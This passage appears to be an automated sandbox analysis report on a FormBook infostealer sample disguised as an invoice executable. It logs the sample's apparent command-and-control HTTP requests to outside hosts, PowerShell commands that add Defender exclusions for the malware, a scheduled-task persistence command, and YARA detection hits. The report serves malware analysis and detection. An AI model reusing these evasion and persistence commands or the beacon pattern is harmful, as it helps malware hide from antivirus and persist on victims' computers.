                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 70 72 65 6d 69 65 72 2d 6d 6f 6d 65 6e 74 2e 69 6e 66 6f 2f 6d 61 77 39 2f 3f 41 56 46 3d 36 2b 63 39 57 77 41 39 31 76 63 33 71 31 71 50 56 2f 62 78 64 62 34 6a 4c 43 77 66 72 42 6f 36 6d 6b 47 41 6a 58 65 64 6d 4d 4d 65 61 57 71 4e 56 54 4e 4f 4a 33 33 6c 45 57 37 72 4d 54 59 54 30 45 7a 78 57 37 37 64 43 67 3d 3d 26 61 6d 70 3b 36 6c 3d 73 48 62 4c 70 64 77 38 78 30 4e 78 34 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://www.premier-moment.info/maw9/?AVF=6+c9WwA91vc3q1qPV/bxdb4jLCwfrBo6mkGAjXedmMMeaWqNVTNOJ33lEW7rMTYT0EzxW77dCg==&amp;6l=sHbLpdw8x0Nx4">here</a>.</p></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
2 | 192.168.2.6 | 49760 | 181.214.142.2 | 80 | C:\Windows\explorer.exe
Timestamp | kBytes transferred | Direction | Data
May 3, 2021 14:53:52.576576948 CEST | 11193 | OUT | GET /maw9/?AVF=cbTyfQFVyV4qwzSuB5gkHhMhd4ZKxxzMSggVhGr4392xKRAUAYS1aRQvNzIyvi+llhoR0m7eyA==&6l=sHbLpdw8x0Nx4 HTTP/1.1
Host: www.ecosanhn.com
Connection: close
Data Raw: 00 00 00 00 00 00 00
Data Ascii:
May 3, 2021 14:53:52.709163904 CEST | 11194 | IN | HTTP/1.1 404 Not Found
Connection: close
Content-Type: text/html
Transfer-Encoding: chunked
Date: Mon, 03 May 2021 12:53:52 GMT
Server: LiteSpeed
                                                                    Data Raw: 32 38 37 32 0d 0a 0a 0a 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 50 72 61 67 6d 61 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 45 78 70 69 72 65 73 22 20 63 6f 6e 74 65 6e 74 3d 22 30 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 34 70 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 2e 34 32 38 35 37 31 34 32 39 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 66 66 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 32 46 33 32 33 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 
20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 73 65 63 74 69 6f 6e 2c 20 66 6f 6f 74 65 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 63 6f 6e 74 61 69 6e 65 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 61 75 74 6f 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 20 61 75 74 6f 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 20 31 30 70 78 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 72 65 73 70 6f 6e 73 65 2d 69 6e 66 6f 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 43 43 43 43 43 43 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 73 74 61 74 75 73 2d 63 6f 64 65 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 35 30 30 25 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 73 74 61 74 75 73 2d 72 65 61 73 6f 6e 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 35 30 25 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 63 6f 6e 74 61 63 74 2d 69 6e 66 6f 2c 0a 20 20 20 20 20 20 20 20 2e 72 65 61 73 6f 6e 2d 74 65 78 74 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 30 30 30 30
                                                                    Data Ascii: 2872<!DOCTYPE html><html> <head> <meta http-equiv="Content-type" content="text/html; charset=utf-8"> <meta http-equiv="Cache-control" content="no-cache"> <meta http-equiv="Pragma" content="no-cache"> <meta http-equiv="Expires" content="0"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <title>404 Not Found</title> <style type="text/css"> body { font-family: Arial, Helvetica, sans-serif; font-size: 14px; line-height: 1.428571429; background-color: #ffffff; color: #2F3230; padding: 0; margin: 0; } section, footer { display: block; padding: 0; margin: 0; } .container { margin-left: auto; margin-right: auto; padding: 0 10px; } .response-info { color: #CCCCCC; } .status-code { font-size: 500%; } .status-reason { font-size: 250%; display: block; } .contact-info, .reason-text { color: #0000
                                                                    May 3, 2021 14:53:52.709183931 CEST11196INData Raw: 30 30 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 61 64 64 69 74 69 6f 6e 61 6c 2d 69 6e 66 6f 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 72 65 70 65 61 74 3a 20 6e 6f 2d 72 65 70 65 61 74 3b
                                                                    Data Ascii: 00; } .additional-info { background-repeat: no-repeat; background-color: #293A4A; color: #FFFFFF; } .additional-info a { color: #FFFFFF; } .additio
                                                                    May 3, 2021 14:53:52.709220886 CEST11197INData Raw: 20 20 20 7d 0a 20 20 20 20 20 20 20 20 66 6f 6f 74 65 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 36 30 70 78 20 30 3b 0a
                                                                    Data Ascii: } footer { text-align: center; margin: 60px 0; } footer a { text-decoration: none; } footer a img { border: 0; } .copyright {
                                                                    May 3, 2021 14:53:52.709239006 CEST11199INData Raw: 6e 3a 20 30 20 31 30 70 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 2e 73 74 61 74 75 73 2d 72 65 61 73 6f 6e 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 69 6e 6c
                                                                    Data Ascii: n: 0 10px; } .status-reason { display: inline; } } @media (min-width: 992px) { .additional-info { background-image: url(data:image/png;base64,iVBOR
                                                                    May 3, 2021 14:53:52.709256887 CEST11200INData Raw: 42 2b 49 6b 66 44 74 62 79 43 41 54 67 74 48 42 37 6c 33 54 72 4b 55 47 32 79 57 4f 65 37 4f 32 4b 59 51 49 50 45 37 78 46 44 31 32 59 76 79 36 53 76 71 6f 4c 4f 4d 66 39 35 6b 2b 42 76 67 71 6f 67 43 46 43 78 32 32 4e 64 6c 74 4f 31 65 70 59 63
                                                                    Data Ascii: B+IkfDtbyCATgtHB7l3TrKUG2yWOe7O2KYQIPE7xFD12Yvy6SvqoLOMf95k+BvgqogCFCx22NdltO1epYc7ycEKSaI9+UAYPGOlKDQYyxDP9Npqv0NKZkS7GuNRQig5pvaYQwdTztjRnCrr/l0b2UgO+wRtMiFCAzqpLL0So+hWmi61Nn3aqKGEzDfFrmEoKqcWSFDRONSrAU0iFYLrHU2RKB3q+HxDHT4JKEe2prhxY1aCS5lY
                                                                    May 3, 2021 14:53:52.709278107 CEST11201INData Raw: 51 45 66 52 49 75 36 54 66 42 59 4c 51 6e 2f 4a 33 65 43 63 46 64 45 37 69 34 64 77 6d 48 63 6b 57 45 72 4a 73 6d 55 37 65 49 73 47 6e 4c 78 70 56 70 56 45 54 49 34 6b 56 4d 33 56 43 55 77 31 2b 58 64 52 50 52 61 4d 30 6b 36 34 6a 4c 31 4c 45 46
                                                                    Data Ascii: QEfRIu6TfBYLQn/J3eCcFdE7i4dwmHckWErJsmU7eIsGnLxpVpVETI4kVM3VCUw1+XdRPRaM0k64jL1LEFkBBGRw7ad1ZE+AVH74Xh8NQM/dZMxVKDkPCyWmbPJ/8uIQJ/XbiL8bNKvv0vWlLCb0fQjR9zuU1y+sSkjcqsgPAzCVGFWzPpYxJM9GAMXhGRinD85xkrCxEomEY7I7j/40IEvjWlJ7wDzjJZtmbCW/cChOPPtlICM
                                                                    May 3, 2021 14:53:52.709296942 CEST11203INData Raw: 2b 51 4e 4e 4f 77 33 50 64 43 4c 67 70 42 55 52 4f 50 51 31 38 6d 58 31 5a 45 78 38 70 39 2f 2f 49 69 30 71 63 33 51 69 36 43 6d 41 55 31 64 45 70 44 39 53 41 31 74 54 39 38 2f 47 5a 61 64 76 66 32 39 47 78 50 59 50 68 39 6e 2b 4d 6a 41 75 52 4e
                                                                    Data Ascii: +QNNOw3PdCLgpBUROPQ18mX1ZEx8p9//Ii0qc3Qi6CmAU1dEpD9SA1tT98/GZadvf29GxPYPh9n+MjAuRNg/Hc4WYm8WjT0pABNB7WkAb81kz8fEo5Na0rAQYU8KQEWEPSkAaafnRPiXEGHPCCbcnxphIEPPnhXc9XkRNuHh3Cw8JXteeCV7Zjg/wua8YGl3XvDUPy/c/Avd4/hNDSqegQAAAABJRU5ErkJggg==);
                                                                    May 3, 2021 14:53:52.709311962 CEST11204INData Raw: 20 20 20 20 20 3c 69 6d 67 20 73 72 63 3d 22 2f 69 6d 67 2d 73 79 73 2f 73 65 72 76 65 72 5f 6d 69 73 63 6f 6e 66 69 67 75 72 65 64 2e 70 6e 67 22 20 63 6c 61 73 73 3d 22 69 6e 66 6f 2d 69 6d 61 67 65 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 20 20
                                                                    Data Ascii: <img src="/img-sys/server_misconfigured.png" class="info-image" /> <div class="info-heading"> www.ecosanhn.com/cp_errordocument.shtml (port 80) </div>


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
3 | 192.168.2.6 | 49762 | 34.102.136.180 | 80 | C:\Windows\explorer.exe
Timestamp | kBytes transferred | Direction | Data
May 3, 2021 14:54:02.857573986 CEST | 11237 | OUT | GET /maw9/?AVF=ueXSnp9RuZV4VGv1GREwgsKbz6ngTp3QynINalfLY22/qL3buQO/ZY9WhadtjkGC+9EglwJKpA==&6l=sHbLpdw8x0Nx4 HTTP/1.1
Host: www.curvygirlholiday.com
Connection: close
Data Raw: 00 00 00 00 00 00 00
Data Ascii:
May 3, 2021 14:54:02.995352030 CEST | 11238 | IN | HTTP/1.1 403 Forbidden
Server: openresty
Date: Mon, 03 May 2021 12:54:02 GMT
Content-Type: text/html
Content-Length: 275
ETag: "608f64c6-113"
Via: 1.1 google
Connection: close
                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                                    Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


Session ID:4
Source IP:192.168.2.6
Source Port:49763
Destination IP:107.180.57.119
Destination Port:80
Process:C:\Windows\explorer.exe

Timestamp:May 3, 2021 14:54:13.310914993 CEST
kBytes transferred:11240
Direction:OUT
Data:
GET /maw9/?AVF=CxDYGZqaFGf+wggxXYaRsXxHYh0vkMvLuxQU/eiz8BKY71rUvugXdjEA5Q+gRIVecMz1lX5ZhQ==&6l=sHbLpdw8x0Nx4 HTTP/1.1
Host: www.networkingmaderas.com
Connection: close
Data Raw: 00 00 00 00 00 00 00
Data Ascii:

Timestamp:May 3, 2021 14:54:13.470249891 CEST
kBytes transferred:11241
Direction:IN
Data:
HTTP/1.1 404 Not Found
Date: Mon, 03 May 2021 12:54:13 GMT
Server: Apache
Upgrade: h2,h2c
Connection: Upgrade, close
Accept-Ranges: bytes
Vary: Accept-Encoding,User-Agent
Content-Length: 1699
Content-Type: text/html
Data Ascii: <!DOCTYPE html><html><head><title>File Not Found</title><meta http-equiv="content-type" content="text/html; charset=utf-8" ><meta name="viewport" content="width=device-width, initial-scale=1.0"><style type="text/css">body { background-color: #eee;}body, h1, p { font-family: "Helvetica Neue", "Segoe UI", Segoe, Helvetica, Arial, "Lucida Grande", sans-serif; font-weight: normal; margin: 0; padding: 0; text-align: center;}.container { margin-left: auto; margin-right: auto; margin-top: 177px; max-width: 1170px; padding-right: 15px; padding-left: 15px;}.row:before, .row:after { display: table; content: " ";}.col-md-6 { width: 50%;}.col-md-push-3 { margin-left: 25%;}h1 { font-size: 48px; font-weight: 300; margin: 0 0 20px 0;}.lead { font-size: 21px; font-weight: 200; margin-bottom: 20px;}p { margin: 0 0 10px;}a { color: #3282e6; text-decoration: none;}</style></head><body><div class="container text-center" id="error"> <svg height="100" width="100"> <polygon points="50,25 17,80 82,80" stroke-linejoin="rou

Timestamp:May 3, 2021 14:54:13.470271111 CEST
kBytes transferred:11242
Direction:IN
Data:
Data Ascii: nd" style="fill:none;stroke:#ff8a00;stroke-width:8" /> <text x="42" y="74" fill="#ff8a00" font-family="sans-serif" font-weight="900" font-size="42px">!</text> </svg> <div class="row"> <div class="col-md-12"> <div class="main-i


Code Manipulations

Statistics

CPU Usage

Memory Usage

High Level Behavior Distribution

Behavior

System Behavior

General

Start time:14:52:19
Start date:03/05/2021
Path:C:\Users\user\Desktop\HAWB AND INV.exe
Wow64 process (32bit):true
Commandline:'C:\Users\user\Desktop\HAWB AND INV.exe'
Imagebase:0x970000
File size:741376 bytes
MD5 hash:42662765A94CE5ECE11529509F937711
Has elevated privileges:true
Has administrator privileges:true
Programmed in:.Net C# or VB.NET
Yara matches:
• Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000000.00000002.347517443.0000000002CE1000.00000004.00000001.sdmp, Author: Joe Security
• Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.350474951.0000000003CE9000.00000004.00000001.sdmp, Author: Joe Security
• Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.350474951.0000000003CE9000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
• Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.350474951.0000000003CE9000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
Reputation:low

General

Start time:14:52:24
Start date:03/05/2021
Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):true
Commandline:'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\HAWB AND INV.exe'
Imagebase:0xd30000
File size:430592 bytes
MD5 hash:DBA3E6449E97D4E3DF64527EF7012A10
Has elevated privileges:true
Has administrator privileges:true
Programmed in:.Net C# or VB.NET
Reputation:high

General

Start time:14:52:24
Start date:03/05/2021
Path:C:\Windows\System32\conhost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:0x7ff61de10000
File size:625664 bytes
MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:high

General

Start time:14:52:25
Start date:03/05/2021
Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):true
Commandline:'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\qxnptkmQbHB.exe'
Imagebase:0xd30000
File size:430592 bytes
MD5 hash:DBA3E6449E97D4E3DF64527EF7012A10
Has elevated privileges:true
Has administrator privileges:true
Programmed in:.Net C# or VB.NET
Reputation:high

General

Start time:14:52:25
Start date:03/05/2021
Path:C:\Windows\System32\conhost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:0x7ff61de10000
File size:625664 bytes
MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:high

General

Start time:14:52:25
Start date:03/05/2021
Path:C:\Windows\SysWOW64\schtasks.exe
Wow64 process (32bit):true
Commandline:'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\qxnptkmQbHB' /XML 'C:\Users\user\AppData\Local\Temp\tmp9D41.tmp'
Imagebase:0xe0000
File size:185856 bytes
MD5 hash:15FF7D8324231381BAD48A052F85DF04
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:high

General

Start time:14:52:25
Start date:03/05/2021
Path:C:\Windows\System32\conhost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:0x7ff61de10000
File size:625664 bytes
MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:high

General

Start time:14:52:26
Start date:03/05/2021
Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):true
Commandline:'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\qxnptkmQbHB.exe'
Imagebase:0xd30000
File size:430592 bytes
MD5 hash:DBA3E6449E97D4E3DF64527EF7012A10
Has elevated privileges:true
Has administrator privileges:true
Programmed in:.Net C# or VB.NET
Reputation:high

General

Start time:14:52:27
Start date:03/05/2021
Path:C:\Windows\System32\conhost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:0x7ff61de10000
File size:625664 bytes
MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:high

General

Start time:14:52:27
Start date:03/05/2021
Path:C:\Users\user\Desktop\HAWB AND INV.exe
Wow64 process (32bit):true
Commandline:C:\Users\user\Desktop\HAWB AND INV.exe
Imagebase:0x750000
File size:741376 bytes
MD5 hash:42662765A94CE5ECE11529509F937711
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Yara matches:
• Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000A.00000002.473823367.0000000000C50000.00000040.00000001.sdmp, Author: Joe Security
• Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000A.00000002.473823367.0000000000C50000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
• Rule: Formbook, Description: detect Formbook in memory, Source: 0000000A.00000002.473823367.0000000000C50000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
• Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000A.00000002.470161659.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
• Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000A.00000002.470161659.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
• Rule: Formbook, Description: detect Formbook in memory, Source: 0000000A.00000002.470161659.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
• Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000A.00000002.482267255.00000000014E0000.00000040.00000001.sdmp, Author: Joe Security
• Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000A.00000002.482267255.00000000014E0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
• Rule: Formbook, Description: detect Formbook in memory, Source: 0000000A.00000002.482267255.00000000014E0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
Reputation:low

General

Start time:14:52:30
Start date:03/05/2021
Path:C:\Windows\explorer.exe
Wow64 process (32bit):false
Commandline:
Imagebase:0x7ff6f22f0000
File size:3933184 bytes
MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:high

General

Start time:14:53:23
Start date:03/05/2021
Path:C:\Windows\SysWOW64\ipconfig.exe
Wow64 process (32bit):true
Commandline:C:\Windows\SysWOW64\ipconfig.exe
Imagebase:0xaa0000
File size:29184 bytes
MD5 hash:B0C7423D02A007461C850CD0DFE09318
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Yara matches:
• Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000017.00000002.593665337.0000000000880000.00000004.00000001.sdmp, Author: Joe Security
• Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000017.00000002.593665337.0000000000880000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
• Rule: Formbook, Description: detect Formbook in memory, Source: 00000017.00000002.593665337.0000000000880000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
• Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000017.00000002.591815076.0000000000110000.00000040.00000001.sdmp, Author: Joe Security
• Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000017.00000002.591815076.0000000000110000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
• Rule: Formbook, Description: detect Formbook in memory, Source: 00000017.00000002.591815076.0000000000110000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
• Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000017.00000002.593621716.0000000000850000.00000040.00000001.sdmp, Author: Joe Security
Reputation:moderate

Disassembly

Code Analysis


                                                                      Executed Functions

                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.347181866.00000000012A0000.00000040.00000001.sdmp, Offset: 012A0000, based on PE: false
                                                                      Similarity
                                                                      • API ID: HandleModule
                                                                      • String ID:
                                                                      • API String ID: 4139908857-0
                                                                      • Opcode ID: 9804b800d832f05da101ab91401f43f8962d048e0fcc4c65f7df5ab555aad293
                                                                      • Instruction ID: 35736a36d13ddf6486f7a28dd9a28d0c274811f31c4c4d6d69e56b4271a411d3
                                                                      • Opcode Fuzzy Hash: 9804b800d832f05da101ab91401f43f8962d048e0fcc4c65f7df5ab555aad293
                                                                      • Instruction Fuzzy Hash: B9713470A10B069FDB24DF2AD44576ABBF1FF88304F40892DE686D7A40EB75E805CB91
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 012AE02A
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.347181866.00000000012A0000.00000040.00000001.sdmp, Offset: 012A0000, based on PE: false
                                                                      Similarity
                                                                      • API ID: CreateWindow
                                                                      • String ID:
                                                                      • API String ID: 716092398-0
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 012AE02A
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.347181866.00000000012A0000.00000040.00000001.sdmp, Offset: 012A0000, based on PE: false
                                                                      Similarity
                                                                      • API ID: CreateWindow
                                                                      • String ID:
                                                                      • API String ID: 716092398-0
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,012A7046,?,?,?,?,?), ref: 012A7107
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.347181866.00000000012A0000.00000040.00000001.sdmp, Offset: 012A0000, based on PE: false
                                                                      Similarity
                                                                      • API ID: DuplicateHandle
                                                                      • String ID:
                                                                      • API String ID: 3793708945-0
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • LoadLibraryA.KERNELBASE(?), ref: 0583EF6A
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.363091747.0000000005830000.00000040.00000001.sdmp, Offset: 05830000, based on PE: false
                                                                      Similarity
                                                                      • API ID: LibraryLoad
                                                                      • String ID:
                                                                      • API String ID: 1029625771-0
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
